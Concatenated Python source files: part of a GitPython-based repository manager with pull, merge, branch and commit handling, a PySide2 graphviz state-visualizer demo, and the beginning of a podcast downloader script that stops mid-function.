"""
name: name of repo
root: root directory to create new repo
"""
if root is None:
p = name
else:
p = os.path.join(root, name)
self.path = p
self.set_name(p)
if os.path.isdir(p):
self.init_repo(p)
return True
else:
os.mkdir(p)
repo = Repo.init(p)
self.debug("created new repo {}".format(p))
self._repo = repo
return False
def init_repo(self, path):
"""
path: absolute path to repo
return True if git repo exists
"""
if os.path.isdir(path):
g = os.path.join(path, ".git")
if os.path.isdir(g):
self._repo = Repo(path)
self.set_name(path)
return True
else:
self.debug("{} is not a valid repo. Initializing now".format(path))
self._repo = Repo.init(path)
self.set_name(path)
def delete_local_commits(self, remote="origin", branch=None):
if branch is None:
branch = self._repo.active_branch.name
self._repo.git.reset("--hard", "{}/{}".format(remote, branch))
def delete_commits(self, hexsha, remote="origin", branch=None, push=True):
if branch is None:
branch = self._repo.active_branch.name
self._repo.git.reset("--hard", hexsha)
if push:
self._repo.git.push(remote, branch, "--force")
def add_paths_explicit(self, apaths):
self.index.add(apaths)
def add_paths(self, apaths):
if not isinstance(apaths, (list, tuple)):
apaths = (apaths,)
changes = self.get_local_changes(change_type=("A", "R", "M"))
changes = [os.path.join(self.path, c) for c in changes]
if changes:
self.debug("-------- local changes ---------")
for c in changes:
self.debug(c)
deletes = self.get_local_changes(change_type=("D",))
if deletes:
self.debug("-------- deletes ---------")
for c in deletes:
self.debug(c)
untracked = self.untracked_files()
if untracked:
self.debug("-------- untracked paths --------")
for t in untracked:
self.debug(t)
changes.extend(untracked)
self.debug("add paths {}".format(apaths))
ps = [p for p in apaths if p in changes]
self.debug("changed paths {}".format(ps))
changed = bool(ps)
if ps:
for p in ps:
self.debug("adding to index: {}".format(os.path.relpath(p, self.path)))
self.index.add(ps)
ps = [p for p in apaths if p in deletes]
self.debug("delete paths {}".format(ps))
delete_changed = bool(ps)
if ps:
for p in ps:
self.debug(
"removing from index: {}".format(os.path.relpath(p, self.path))
)
self.index.remove(ps, working_tree=True)
return changed or delete_changed
def add_ignore(self, *args):
ignores = []
p = os.path.join(self.path, ".gitignore")
if os.path.isfile(p):
with open(p, "r") as rfile:
ignores = [line.strip() for line in rfile]
args = [a for a in args if a not in ignores]
if args:
with open(p, "a") as afile:
for a in args:
afile.write("{}\n".format(a))
self.add(p, commit=False)
def get_modification_date(self, path):
"""
"Fri May 18 11:13:57 2018 -0600"
:param path:
:return:
"""
d = self.cmd(
"log",
"-1",
'--format="%ad"',
"--date=format:{}".format(DATE_FORMAT),
"--",
path,
)
if d:
d = d[1:-1]
return d
def out_of_date(self, branchname=None):
repo = self._repo
if branchname is None:
branchname = repo.active_branch.name
pd = open_progress(2)
origin = repo.remotes.origin
pd.change_message("Fetching {} {}".format(origin, branchname))
repo.git.fetch(origin, branchname)
pd.change_message("Complete")
# try:
# oref = origin.refs[branchname]
# remote_commit = oref.commit
# except IndexError:
# remote_commit = None
#
# branch = getattr(repo.heads, branchname)
# local_commit = branch.commit
local_commit, remote_commit = self._get_local_remote_commit(branchname)
self.debug("out of date {} {}".format(local_commit, remote_commit))
return local_commit != remote_commit
def _get_local_remote_commit(self, branchname=None):
repo = self._repo
origin = repo.remotes.origin
try:
oref = origin.refs[branchname]
remote_commit = oref.commit
except IndexError:
remote_commit = None
if branchname is None:
branch = repo.active_branch.name
else:
try:
branch = repo.heads[branchname]
except AttributeError:
return None, None
local_commit = branch.commit
return local_commit, remote_commit
@classmethod
def clone_from(cls, url, path):
repo = cls()
if repo.clone(url, path):
return repo
# # progress = open_progress(100)
# #
# # def func(op_code, cur_count, max_count=None, message=''):
# # if max_count:
# # progress.max = int(max_count) + 2
# # if message:
# # message = 'Cloning repository {} -- {}'.format(url, message[2:])
# # progress.change_message(message, auto_increment=False)
# # progress.update(int(cur_count))
# #
# # if op_code == 66:
# # progress.close()
# # rprogress = CallableRemoteProgress(func)
# rprogress = None
# try:
# Repo.clone_from(url, path, progress=rprogress)
# except GitCommandError as e:
# print(e)
# shutil.rmtree(path)
# # def foo():
# # try:
# # Repo.clone_from(url, path, progress=rprogress)
# # except GitCommandError:
# # shutil.rmtree(path)
# #
# # evt.set()
#
# # t = Thread(target=foo)
# # t.start()
# # period = 0.1
# # while not evt.is_set():
# # st = time.time()
# # # v = prog.get_value()
# # # if v == n - 2:
# # # prog.increase_max(50)
# # # n += 50
# # #
# # # prog.increment()
# # time.sleep(max(0, period - time.time() + st))
# # prog.close()
def clone(self, url, path, reraise=False):
try:
self._repo = Repo.clone_from(url, path)
return True
except GitCommandError as e:
self.warning_dialog(
"Cloning error: {}, url={}, path={}".format(e, url, path),
position=(100, 100),
)
if reraise:
raise
def unpack_blob(self, hexsha, p):
"""
p: str. should be absolute path
"""
repo = self._repo
tree = repo.commit(hexsha).tree
# blob = next((bi for ti in tree.trees
# for bi in ti.blobs
# if bi.abspath == p), None)
blob = None
for ts in ((tree,), tree.trees):
for ti in ts:
for bi in ti.blobs:
# print bi.abspath, p
if bi.abspath == p:
blob = bi
break
else:
print("failed unpacking", p)
return blob.data_stream.read() if blob else ""
def shell(self, cmd, *args):
repo = self._repo
func = getattr(repo.git, cmd)
return func(*args)
def truncate_repo(self, date="1 month"):
repo = self._repo
name = os.path.basename(self.path)
backup = ".{}".format(name)
repo.git.clone("--mirror", "".format(name), "./{}".format(backup))
logs = repo.git.log("--pretty=%H", '-after "{}"'.format(date))
logs = reversed(logs.split("\n"))
sha = next(logs)
gpath = os.path.join(self.path, ".git", "info", "grafts")
with open(gpath, "w") as wfile:
wfile.write(sha)
repo.git.filter_branch("--tag-name-filter", "cat", "--", "--all")
repo.git.gc("--prune=now")
def get_dag(self, branch=None, delim="$", limit=None, simplify=True):
fmt_args = ("%H", "%ai", "%ar", "%s", "%an", "%ae", "%d", "%P")
fmt = delim.join(fmt_args)
args = [
"--abbrev-commit",
"--topo-order",
"--reverse",
# '--author-date-order',
# '--decorate=full',
"--format={}".format(fmt),
]
if simplify:
args.append("--simplify-by-decoration")
if branch == NULL_STR:
args.append("--all")
else:
args.append("-b")
args.append(branch)
if limit:
args.append("-{}".format(limit))
return self._repo.git.log(*args)
def commits_iter(self, p, keys=None, limit="-"):
repo = self._repo
p = os.path.join(repo.working_tree_dir, p)
p = p.replace(" ", "\ ")
hx = repo.git.log(
"--pretty=%H", "--follow", "-{}".format(limit), "--", p
).split("\n")
def func(hi):
commit = repo.rev_parse(hi)
r = [
hi,
]
if keys:
r.extend([getattr(commit, ki) for ki in keys])
return r
return (func(ci) for ci in hx)
def odiff(self, a, b, **kw):
a = self._repo.commit(a)
return a.diff(b, **kw)
def diff(self, a, b, *args):
return self._git_command(lambda g: g.diff(a, b, *args), "diff")
def status(self):
return self._git_command(lambda g: g.status(), "status")
def report_local_changes(self):
self.debug("Local Changes to {}".format(self.path))
for p in self.get_local_changes():
self.debug("\t{}".format(p))
def commit_dialog(self):
from pychron.git_archive.commit_dialog import CommitDialog
ps = self.get_local_changes()
cd = CommitDialog(ps)
info = cd.edit_traits()
if info.result:
index = self.index
index.add([mp.path for mp in cd.valid_paths()])
self.commit(cd.commit_message)
return True
def get_local_changes(self, change_type=("M",)):
repo = self._repo
diff = repo.index.diff(None)
return [
di.a_blob.abspath
for change_type in change_type
for di in diff.iter_change_type(change_type)
]
# diff_str = repo.git.diff('HEAD', '--full-index')
# diff_str = StringIO(diff_str)
# diff_str.seek(0)
#
# class ProcessWrapper:
# stderr = None
# stdout = None
#
# def __init__(self, f):
# self._f = f
#
# def wait(self, *args, **kw):
# pass
#
# def read(self):
# return self._f.read()
#
# proc = ProcessWrapper(diff_str)
#
# diff = Diff._index_from_patch_format(repo, proc)
# root = self.path
#
#
#
# for diff_added in hcommit.diff('HEAD~1').iter_change_type('A'):
# print(diff_added)
# diff = hcommit.diff()
# diff = repo.index.diff(repo.head.commit)
# return [os.path.relpath(di.a_blob.abspath, root) for di in diff.iter_change_type('M')]
# patches = map(str.strip, diff_str.split('diff --git'))
# patches = ['\n'.join(p.split('\n')[2:]) for p in patches[1:]]
#
# diff_str = StringIO(diff_str)
# diff_str.seek(0)
# index = Diff._index_from_patch_format(repo, diff_str)
#
# return index, patches
#
def get_head_object(self):
return get_head_commit(self._repo)
def get_head(self, commit=True, hexsha=True):
head = self._repo
if commit:
head = head.commit()
if hexsha:
head = head.hexsha
return head
# return self._repo.head.commit.hexsha
def cmd(self, cmd, *args):
return getattr(self._repo.git, cmd)(*args)
def is_dirty(self):
return self._repo.is_dirty()
def untracked_files(self):
lines = self._repo.git.status(porcelain=True, untracked_files=True)
# Untracked files preffix in porcelain mode
prefix = "?? "
untracked_files = list()
iswindows = sys.platform == "win32"
for line in lines.split("\n"):
if not line.startswith(prefix):
continue
filename = line[len(prefix) :].rstrip("\n")
# Special characters are escaped
if filename[0] == filename[-1] == '"':
filename = filename[1:-1].decode("string_escape")
if iswindows:
filename = filename.replace("/", "\\")
untracked_files.append(os.path.join(self.path, filename))
# finalize_process(proc)
return untracked_files
def has_staged(self):
return self._repo.git.diff("HEAD", "--name-only")
# return self._repo.is_dirty()
def has_unpushed_commits(self, remote="origin", branch="master"):
if self._repo:
# return self._repo.git.log('--not', '--remotes', '--oneline')
if remote in self._repo.remotes:
return self._repo.git.log(
"{}/{}..HEAD".format(remote, branch), "--oneline"
)
def add_unstaged(self, root=None, add_all=False, extension=None, use_diff=False):
if root is None:
root = self.path
index = self.index
def func(ps, extension):
if extension:
if not isinstance(extension, tuple):
extension = (extension,)
ps = [pp for pp in ps if os.path.splitext(pp)[1] in extension]
if ps:
self.debug("adding to index {}".format(ps))
index.add(ps)
if use_diff:
pass
# try:
# ps = [diff.a_blob.path for diff in index.diff(None)]
# func(ps, extension)
# except IOError,e:
# print 'exception', e
elif add_all:
self._repo.git.add(".")
else:
for r, ds, fs in os.walk(root):
ds[:] = [d for d in ds if d[0] != "."]
ps = [os.path.join(r, fi) for fi in fs]
func(ps, extension)
def update_gitignore(self, *args):
p = os.path.join(self.path, ".gitignore")
# mode = 'a' if os.path.isfile(p) else 'w'
args = list(args)
if os.path.isfile(p):
with open(p, "r") as rfile:
for line in fileiter(rfile, strip=True):
for i, ai in enumerate(args):
if line == ai:
args.pop(i)
if args:
with open(p, "a") as wfile:
for ai in args:
wfile.write("{}\n".format(ai))
self._add_to_repo(p, msg="updated .gitignore")
def get_commit(self, hexsha):
repo = self._repo
return repo.commit(hexsha)
def tag_branch(self, tagname):
repo = self._repo
repo.create_tag(tagname)
def get_current_branch(self):
repo = self._repo
return repo.active_branch.name
def checkout_branch(self, name, inform=True):
repo = self._repo
if name.startswith("origin"):
name = name[7:]
remote = repo.remote()
rref = getattr(remote.refs, name)
repo.create_head(name, rref)
branch = repo.heads[name]
branch.set_tracking_branch(rref)
else:
branch = getattr(repo.heads, name)
try:
branch.checkout()
self.selected_branch = name
self._load_branch_history()
if inform:
self.information_dialog('Repository now on branch "{}"'.format(name))
except BaseException as e:
self.warning_dialog(
'There was an issue trying to checkout branch "{}"'.format(name)
)
raise e
def delete_branch(self, name):
self._repo.delete_head(name)
def get_branch(self, name):
return getattr(self._repo.heads, name)
def create_branch(self, name=None, commit="HEAD", inform=True):
repo = self._repo
if name is None:
nb = NewBranchView(branches=repo.branches)
info = nb.edit_traits()
if info.result:
name = nb.name
else:
return
if name not in repo.branches:
branch = repo.create_head(name, commit=commit)
branch.checkout()
if inform:
self.information_dialog('Repository now on branch "{}"'.format(name))
return name
def create_remote(self, url, name="origin", force=False):
repo = self._repo
if repo:
self.debug("setting remote {} {}".format(name, url))
# only create remote if doesnt exist
if not hasattr(repo.remotes, name):
self.debug("create remote {}".format(name, url))
repo.create_remote(name, url)
elif force:
repo.delete_remote(name)
repo.create_remote(name, url)
def delete_remote(self, name="origin"):
repo = self._repo
if repo:
if hasattr(repo.remotes, name):
repo.delete_remote(name)
def get_branch_names(self):
return [b.name for b in self._repo.branches] + [
b.name for b in self._repo.remote().refs if b.name.lower() != "origin/head"
]
def git_history_view(self, branchname):
repo = self._repo
h = BaseGitHistory(branchname=branchname)
origin = repo.remotes.origin
try:
oref = origin.refs[branchname]
remote_commit = oref.commit
except IndexError:
remote_commit = None
branch = self.get_branch(branchname)
local_commit = branch.commit
h.local_commit = str(local_commit)
txt = repo.git.rev_list(
"--left-right", "{}...{}".format(local_commit, remote_commit)
)
commits = [ci[1:] for ci in txt.split("\n")]
commits = [repo.commit(i) for i in commits]
h.set_items(commits)
commit_view = CommitView(model=h)
return commit_view
def pull(
self,
branch="master",
remote="origin",
handled=True,
use_progress=True,
use_auto_pull=False,
):
"""
fetch and merge
if use_auto_pull is False ask user if they want to accept the available updates
"""
self.debug("pulling {} from {}".format(branch, remote))
repo = self._repo
try:
remote = self._get_remote(remote)
except AttributeError as e:
print("repo man pull", e)
return
if remote:
self.debug("pulling from url: {}".format(remote.url))
if use_progress:
prog = open_progress(
3,
show_percent=False,
title="Pull Repository {}".format(self.name),
close_at_end=False,
)
prog.change_message(
'Fetching branch:"{}" from "{}"'.format(branch, remote)
)
try:
self.fetch(remote)
except GitCommandError as e:
self.debug(e)
if not handled:
raise e
self.debug("fetch complete")
def merge():
try:
repo.git.merge("FETCH_HEAD")
except GitCommandError as e:
self.critical("Pull-merge FETCH_HEAD={}".format(e))
self.smart_pull(branch=branch, remote=remote)
if not use_auto_pull:
ahead, behind = self.ahead_behind(remote)
if behind:
if self.confirmation_dialog(
'Repository "{}" is behind the official version by {} changes.\n'
"Would you like to pull the available changes?".format(
self.name, behind
)
):
# show the changes
h = self.git_history_view(branch)
info = h.edit_traits(kind="livemodal")
if info.result:
merge()
else:
merge()
if use_progress:
prog.close()
self.debug("pull complete")
def has_remote(self, remote="origin"):
return bool(self._get_remote(remote))
def push(self, branch="master", remote=None, inform=False):
if remote is None:
remote = "origin"
rr = self._get_remote(remote)
if rr:
try:
self._repo.git.push(remote, branch)
if inform:
self.information_dialog("{} push complete".format(self.name))
except GitCommandError as e:
self.debug_exception()
if inform:
self.warning_dialog(
"{} push failed. See log file for more details".format(
self.name
)
)
# self._git_command(lambda g: g.push(remote, branch), tag='GitRepoManager.push')
else:
self.warning('No remote called "{}"'.format(remote))
def _git_command(self, func, tag):
try:
return func(self._repo.git)
except GitCommandError as e:
self.warning("Git command failed. {}, {}".format(e, tag))
def rebase(self, onto_branch="master"):
if self._repo:
repo = self._repo
branch = self.get_current_branch()
self.checkout_branch(onto_branch)
self.pull()
repo.git.rebase(onto_branch, branch)
def smart_pull(
self,
branch="master",
remote="origin",
quiet=True,
accept_our=False,
accept_their=False,
):
if remote not in self._repo.remotes:
return True
try:
ahead, behind = self.ahead_behind(remote)
except GitCommandError as e:
self.debug("Smart pull error: {}".format(e))
return
self.debug("Smart pull ahead: {} behind: {}".format(ahead, behind))
repo = self._repo
if behind:
if ahead:
if not quiet:
if not self.confirmation_dialog(
"You are {} behind and {} commits ahead. "
"There are potential conflicts that you will have to resolve."
"\n\nWould you like to Continue?".format(behind, ahead)
):
return
# check for unresolved conflicts
# self._resolve_conflicts(branch, remote, accept_our, accept_their, True)
try:
repo.git.merge("--abort")
except GitCommandError:
pass
# potentially conflicts
with StashCTX(repo) as error:
if error:
self.warning_dialog(
"Failed stashing your local changes. "
"Fix repository {} "
"before proceeding. {}".format(
os.path.basename(repo.working_dir), error
)
)
return
# do merge
try:
# repo.git.rebase('--preserve-merges', '{}/{}'.format(remote, branch))
repo.git.merge("{}/{}".format(remote, branch))
except GitCommandError:
if self.confirmation_dialog(
"There appears to be a conflict with {}."
"\n\nWould you like to accept the master copy (Yes).\n\nOtherwise "
"you will need to merge the changes manually (No)".format(
self.name
)
):
try:
repo.git.merge("--abort")
except GitCommandError:
pass
try:
repo.git.reset("--hard", "{}/{}".format(remote, branch))
except GitCommandError:
pass
elif self.confirmation_dialog(
"Would you like to accept all of your current changes even "
"though there are newer changes available?"
):
accept_our = True
# try:
# repo.git.pull('-X', 'theirs', '--commit', '--no-edit')
# return True
# except GitCommandError:
# clean = repo.git.clean('-n')
# if clean:
# if self.confirmation_dialog('''You have untracked files that could be an issue.
# {}
#
# You like to delete them and try again?'''.format(clean)):
# try:
# repo.git.clean('-fd')
# except GitCommandError:
# self.warning_dialog('Failed to clean repository')
# return
#
# try:
# repo.git.pull('-X', 'theirs', '--commit', '--no-edit')
# return True
# except GitCommandError:
# self.warning_dialog('Failed pulling changes for {}'.format(self.name))
# else:
# self.warning_dialog('Failed pulling changes for {}'.format(self.name))
# return
self._resolve_conflicts(branch, remote, accept_our, accept_their, quiet)
else:
self.debug("merging {} commits".format(behind))
self._git_command(
lambda g: g.merge("FETCH_HEAD"), "GitRepoManager.smart_pull/!ahead"
)
else:
self.debug("Up-to-date with {}".format(remote))
if not quiet:
self.information_dialog(
'Repository "{}" up-to-date with {}'.format(self.name, remote)
)
return True
def fetch(self, remote="origin"):
if self._repo:
return self._git_command(lambda g: g.fetch(remote), "GitRepoManager.fetch")
# return self._repo.git.fetch(remote)
def ahead_behind(self, remote="origin"):
self.debug("ahead behind")
repo = self._repo
ahead, behind = ahead_behind(repo, remote)
return ahead, behind
def merge(self, from_, to_=None, inform=True):
repo = self._repo
if to_:
dest = getattr(repo.branches, to_)
dest.checkout()
src = getattr(repo.branches, from_)
try:
repo.git.merge(src.commit)
except GitCommandError:
self.debug_exception()
if inform:
self.warning_dialog(
"Merging {} into {} failed. See log file for more details".format(
from_, to_
)
)
def commit(self, msg, author=None):
self.debug("commit message={}, author={}".format(msg, author))
index = self.index
if index:
try:
index.commit(msg, author=author, committer=author)
return True
except git.exc.GitError as e:
self.warning("Commit failed: {}".format(e))
def add(self, p, msg=None, msg_prefix=None, verbose=True, **kw):
repo = self._repo
# try:
# n = len(repo.untracked_files)
# except IOError:
# n = 0
# try:
# if not repo.is_dirty() and not n:
# return
# except OSError:
# pass
bp = os.path.basename(p)
dest = os.path.join(repo.working_dir, p)
dest_exists = os.path.isfile(dest)
if msg_prefix is None:
msg_prefix = "modified" if dest_exists else "added"
if not dest_exists:
self.debug("copying to destination.{}>>{}".format(p, dest))
shutil.copyfile(p, dest)
if msg is None:
msg = "{}".format(bp)
msg = "{} - {}".format(msg_prefix, msg)
if verbose:
self.debug("add to repo msg={}".format(msg))
self._add_to_repo(dest, msg, **kw)
def get_log(self, branch, *args):
if branch is None:
branch = self._repo.active_branch
# repo = self._repo
# l = repo.active_branch.log(*args)
return self.cmd("log", branch, "--oneline", *args).split("\n")
def get_commits_from_log(self, greps=None, max_count=None, after=None, before=None):
repo = self._repo
args = [repo.active_branch.name, "--remove-empty", "--simplify-merges"]
if max_count:
args.append("--max-count={}".format(max_count))
if after:
args.append("--after={}".format(after))
if before:
args.append("--before={}".format(before))
if greps:
greps = "\|".join(greps)
args.append("--grep=^{}".format(greps))
args.append(LOGFMT)
# txt = self.cmd('log', *args)
# self.debug('git log {}'.format(' '.join(args)))
cs = self._gitlog_commits(args)
return cs
def get_active_branch(self):
return self._repo.active_branch.name
def get_sha(self, path=None):
sha = ""
if path:
logstr = self.cmd("ls-tree", "HEAD", path)
try:
mode, kind, sha_name = logstr.split(" ")
sha, name = sha_name.split("\t")
except ValueError:
pass
return sha
def get_branch_diff(self, from_, to_):
args = ("{}..{}".format(from_, to_), LOGFMT)
return self._gitlog_commits(args)
def add_tag(self, name, message, hexsha=None):
args = ("-a", name, "-m", message)
if hexsha:
args = args + (hexsha,)
self.cmd("tag", *args)
# action handlers
def diff_selected(self):
if self._validate_diff():
if len(self.selected_commits) == 2:
l, r = self.selected_commits
dv = self._diff_view_factory(l, r)
open_view(dv)
def revert_to_selected(self):
# check for uncommitted changes
# warn user the uncommitted changes will be lost if revert now
commit = self.selected_commits[-1]
self.revert(commit.hexsha, self.selected)
def revert(self, hexsha, path):
self._repo.git.checkout(hexsha, path)
self.path_dirty = path
self._set_active_commit()
def revert_commit(self, hexsha):
self._git_command(lambda g: g.revert(hexsha), "revert_commit")
def load_file_history(self, p):
repo = self._repo
try:
hexshas = repo.git.log("--pretty=%H", "--follow", "--", p).split("\n")
self.selected_path_commits = self._parse_commits(hexshas, p)
self._set_active_commit()
except GitCommandError:
self.selected_path_commits = []
def get_modified_files(self, hexsha):
def func(git):
return git.diff_tree("--no-commit-id", "--name-only", "-r", hexsha)
txt = self._git_command(func, "get_modified_files")
return txt.split("\n")
# private
def _gitlog_commits(self, args):
txt = self._git_command(lambda g: g.log(*args), "log")
cs = []
if txt:
cs = [from_gitlog(l.strip()) for l in txt.split("\n")]
return cs
def _resolve_conflicts(self, branch, remote, accept_our, accept_their, quiet):
conflict_paths = self._get_conflict_paths()
self.debug("resolve conflict_paths: {}".format(conflict_paths))
if conflict_paths:
mm = MergeModel(conflict_paths, branch=branch, remote=remote, repo=self)
if accept_our:
mm.accept_our()
elif accept_their:
mm.accept_their()
else:
mv = MergeView(model=mm)
mv.edit_traits(kind="livemodal")
else:
if not quiet:
self.information_dialog("There were no conflicts identified")
def _get_conflict_paths(self):
def func(git):
return git.diff("--name-only", "--diff-filter=U")
txt = self._git_command(func, "get conflict paths")
return [line for line in txt.split("\n") if line.strip()]
def _validate_diff(self):
return True
def _diff_view_factory(self, a, b):
# d = self.diff(a.hexsha, b.hexsha)
if not a.blob:
a.blob = self.unpack_blob(a.hexsha, a.name)
if not b.blob:
b.blob = self.unpack_blob(b.hexsha, b.name)
model = DiffModel(left_text=b.blob, right_text=a.blob)
dv = DiffView(model=model)
return dv
def _add_to_repo(self, p, msg, commit=True):
index = self.index
if index:
if not isinstance(p, list):
p = [p]
try:
index.add(p)
except IOError as e:
self.warning('Failed to add file. Error:"{}"'.format(e))
# an IOError has been caused in the past by "'...index.lock' could not be obtained"
os.remove(os.path.join(self.path, ".git", "index.lock"))
try:
self.warning('Retry after "Failed to add file"'.format(e))
index.add(p)
except IOError as e:
self.warning('Retry failed. Error:"{}"'.format(e))
return
if commit:
index.commit(msg)
def _get_remote(self, remote):
repo = self._repo
try:
return getattr(repo.remotes, remote)
except AttributeError:
pass
def _get_branch_history(self):
repo = self._repo
hexshas = repo.git.log("--pretty=%H").split("\n")
return hexshas
def _load_branch_history(self):
hexshas = self._get_branch_history()
self.commits = self._parse_commits(hexshas)
def _parse_commits(self, hexshas, p=""):
def factory(ci):
repo = self._repo
obj = repo.rev_parse(ci)
cx = GitSha(
message=obj.message,
hexsha=obj.hexsha,
name=p,
date=obj.committed_datetime,
)
# date=format_date(obj.committed_date))
return cx
return [factory(ci) for ci in hexshas]
def _set_active_commit(self):
p = self.selected
with open(p, "r") as rfile:
chexsha = hashlib.sha1(rfile.read()).hexdigest()
for c in self.selected_path_commits:
blob = self.unpack_blob(c.hexsha, p)
c.active = chexsha == hashlib.sha1(blob).hexdigest() if blob else False
self.refresh_commits_table_needed = True
# handlers
def _selected_fired(self, new):
if new:
self._selected_hook(new)
self.load_file_history(new)
def _selected_hook(self, new):
pass
def _remote_changed(self, new):
if new:
self.delete_remote()
r = "https://github.com/{}".format(new)
self.create_remote(r)
@property
def index(self):
return self._repo.index
@property
def active_repo(self):
return self._repo
if __name__ == "__main__":
repo = GitRepoManager()
repo.open_repo("/Users/ross/Sandbox/mergetest/blocal")
repo.smart_pull()
# rp = GitRepoManager()
# rp.init_repo('/Users/ross/Pychrondata_dev/scripts')
# rp.commit_dialog()
# ============= EOF =============================================
# repo manager protocol
# def get_local_changes(self, repo=None):
# repo = self._get_repo(repo)
# diff_str = repo.git.diff('--full-index')
# patches = map(str.strip, diff_str.split('diff --git'))
# patches = ['\n'.join(p.split('\n')[2:]) for p in patches[1:]]
#
# diff_str = StringIO(diff_str)
# diff_str.seek(0)
# index = Diff._index_from_patch_format(repo, diff_str)
#
# return index, patches
# def is_dirty(self, repo=None):
# repo = self._get_repo(repo)
# return repo.is_dirty()
# def get_untracked(self):
# return self._repo.untracked_files
# def _add_repo(self, root):
# existed=True
# if not os.path.isdir(root):
# os.mkdir(root)
# existed=False
#
# gitdir=os.path.join(root, '.git')
# if not os.path.isdir(gitdir):
# repo = Repo.init(root)
# existed = False
# else:
# repo = Repo(root)
#
# return repo, existed
# def add_repo(self, localpath):
# """
# add a blank repo at ``localpath``
# """
# repo, existed=self._add_repo(localpath)
# self._repo=repo
# self.root=localpath
# return existed
|
graphviz_visualizer_no_ros.py
|
# Copyright (c) 2021 Fynn Boyer
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This Python file uses the following encoding: utf-8
import sys
import signal
import os
from threading import Thread
from PySide2 import QtCore
from PySide2.QtWidgets import QApplication
from PySide2.QtCore import Qt, QCoreApplication
script_dir = os.path.dirname( __file__ )
graphviz_visualizer_dir = os.path.join( script_dir, '..' )
sys.path.append( graphviz_visualizer_dir )
import graphviz_visualizer.graphviz_visualizer as graphviz_visualizer
def get_path_to_executed_script():
"""! Get the path to the executed script """
return os.path.dirname( __file__ )
def get_dotfile_template_path(template_file_name):
"""! Get the path to a dotfile template file
@param template_file_name The name of the template file
"""
return os.path.join(get_path_to_executed_script(), "..", "assets", "templates", template_file_name)
def get_ui_file_path(ui_file_name):
"""! Get the path to a dotfile template file
@param template_file_name The name of the ui file
"""
return os.path.join(get_path_to_executed_script(), "..", "assets", "ui", ui_file_name)
def prompt_user_input(graph_vis):
"""! Ask the user for input to update the graph """
while True:
print("Provide a new state for a graph.")
graph_name = input("Enter graph name:")
state_name = input("Enter state:")
graph_vis.update_graph_state(graph_name, state_name)
print("")
def main(args=None):
graph_config = [
{"name": "high_level_fsm",
"current_state": "Init",
"dotfile_template_path": get_dotfile_template_path("task_management_fsm.j2")
},
{"name": "locomotion",
"current_state": "NoDataYet",
"dotfile_template_path": get_dotfile_template_path("task_management_fsm.j2")
},
{"name": "example_graph",
"current_state": "State0",
"dotfile_template_path": get_dotfile_template_path("example_graph.j2")
},
{"name": "example_tree",
"current_state": "chase_ghost",
"dotfile_template_path": get_dotfile_template_path("example_tree.j2")
}
]
node_names = ["Node1", "Node2","Node3","Node4","Node5","Node6","Node7","Node8","Node9","Node10"]
QtCore.QCoreApplication.setAttribute(QtCore.Qt.AA_ShareOpenGLContexts)
app = QApplication([])
setup_interrupt_handling()
ui_path = get_ui_file_path("graphviz_visualizer.ui")
graph_vis = graphviz_visualizer.GraphvizVisualizer(graph_config, node_names, ui_path)
graph_vis.ui.show()
t = Thread(target = prompt_user_input, args = (graph_vis, ), daemon=True)
t.start()
app.exec_()
# t.join()
sys.exit()
# Interrupt handling code from here: https://coldfix.eu/2016/11/08/pyqt-boilerplate/
# Call this function in your main after creating the QApplication
def setup_interrupt_handling():
"""Setup handling of KeyboardInterrupt (Ctrl-C) for PyQt."""
signal.signal(signal.SIGINT, _interrupt_handler)
# Regularly run some (any) python code, so the signal handler gets a
# chance to be executed:
safe_timer(50, lambda: None)
# Define this as a global function to make sure it is not garbage
# collected when going out of scope:
def _interrupt_handler(signum, frame):
"""Handle KeyboardInterrupt: quit application."""
QCoreApplication.quit()
def safe_timer(timeout, func, *args, **kwargs):
"""
Create a timer that is safe against garbage collection and overlapping
calls. See: http://ralsina.me/weblog/posts/BB974.html
"""
def timer_event():
try:
func(*args, **kwargs)
finally:
QtCore.QTimer.singleShot(timeout, timer_event)
QtCore.QTimer.singleShot(timeout, timer_event)
if __name__ == "__main__":
main()
|
getpodcast.py
|
#! /usr/bin/env python3
"""My Podcaster."""
import datetime
import email.utils
from subprocess import call, check_output
import mimetypes
import os
import re
import shutil
import socket
import urllib.error
import urllib.request
import requests
import tqdm
import random
import signal
from Podcast import Podcast
import configparser
from prompt_toolkit import print_formatted_text, HTML
import bs4
import pandas
random.seed(os.urandom(128))
mimetypes.init()
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0) like Gecko",
}
podconfig = configparser.ConfigParser()
podconfig.read(os.path.abspath(os.path.expanduser("~/.podcasterrc")))
PODFILE = podconfig["default"]["podfile"]
BETTERRANDOM = str(podconfig["betterrandom"]["master"]).upper()
BETTERRANDOM_HISTCOUNT = int(podconfig["betterrandom"]["histcount"])
BETTERRANDOM_HIST = os.path.abspath(
os.path.expanduser(podconfig["betterrandom"]["file"]),
)
TIMEOUT = int(podconfig["default"]["timeout"])
DOWNLOADDIR = os.path.abspath(os.path.expanduser(podconfig["default"]["downloaddir"]))
def write_history(pod, title):
"""Append history to a file."""
try:
PLAYED = pandas.read_csv(BETTERRANDOM_HIST, index_col=0)
except FileNotFoundError:
PLAYED = pandas.DataFrame(columns=["Podcast", "Title"])
PLAYED = PLAYED.append({"Podcast": pod, "Title": title}, ignore_index=True)
PLAYED.to_csv(BETTERRANDOM_HIST)
def check_history(pod, title):
"""See if Pod was already played from recent history."""
try:
PLAYED = pandas.read_csv(BETTERRANDOM_HIST, index_col=0)
except FileNotFoundError:
PLAYED = pandas.DataFrame(columns=["Podcast", "Title"])
return any(PLAYED[-BETTERRANDOM_HISTCOUNT:].isin([pod, title]).all(axis="columns"))
def TimedInput(prompt="", default=None, timeout=TIMEOUT):
"""Input with timeout."""
import threading
import time
def print_countdown():
t = threading.current_thread()
while getattr(t, "do_run", True):
try:
time.sleep(1)
countdown = int(signal.getitimer(signal.ITIMER_REAL)[0])
print(countdown + 1, end="..", flush=True)
if bool(countdown):
continue
return
except AlarmException:
return
class AlarmException(Exception):
pass
def alarmHandler(signum, frame):
raise AlarmException
signal.signal(signal.SIGALRM, alarmHandler)
signal.alarm(timeout)
t = threading.Thread(target=print_countdown)
t.start()
try:
text = input(prompt)
signal.alarm(0)
t.do_run = False
t.join()
return text
